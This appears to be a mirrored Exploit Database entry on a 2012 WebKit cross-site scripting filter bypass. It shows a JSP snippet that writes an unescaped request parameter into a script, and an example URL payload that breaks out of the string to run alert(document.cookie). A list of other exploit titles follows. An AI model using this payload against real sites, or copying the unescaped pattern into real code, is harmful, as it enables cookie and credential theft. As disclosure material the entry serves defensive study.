WebKit Cross-Site Scripting Filter – ‘Cross-Site ScriptingAuditor.cpp’ Security Bypass

Exploit Database
115 阅读

作者： Tushar Dalvi

日期： 2012-07-19
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/38024/

source: https://www.securityfocus.com/bid/56570/info

WebKit is prone to a security-bypass vulnerability.

An attacker can exploit this vulnerability to bypass the cross-site scripting filter mechanism. Successful exploits may allow attackers to execute arbitrary script code and steal cookie-based authentication credentials.

Code in test.jsp:

var foo = "<%= request.getParameter("foo") %>";

document.write("<text>Welcome "+ foo + "</text>");

</script>

Example URI:

http://www.domain.com/test.jsp?foo=2"; alert(document.cookie); var a="1

last Exploits
WebKit Cross-Site Scripting Filter – ‘Cross-Site ScriptingAuditor.cpp’ Security Bypass的更多信息

WordPress Plugin image Gallery with Slideshow 1.5 – Multiple Vulnerabilities：
Joomla! Component Content – ‘year’ SQL Injection：
Dasan Networks GPON ONT WiFi Router H64X Series – Privilege Escalation：
Open-AuditIT Professional 2.1 – Cross-Site Scripting：
TinyBB 1.2 – SQL Injection：
Netgear WNR1000 – Authentication Bypass：
WikkaWiki 1.3.2 – Spam Logging PHP Injection (Metasploit)：
Visual Tools DVR3.0.6.16, vx series 4.2.19.2 – Multiple Vulnerabilities：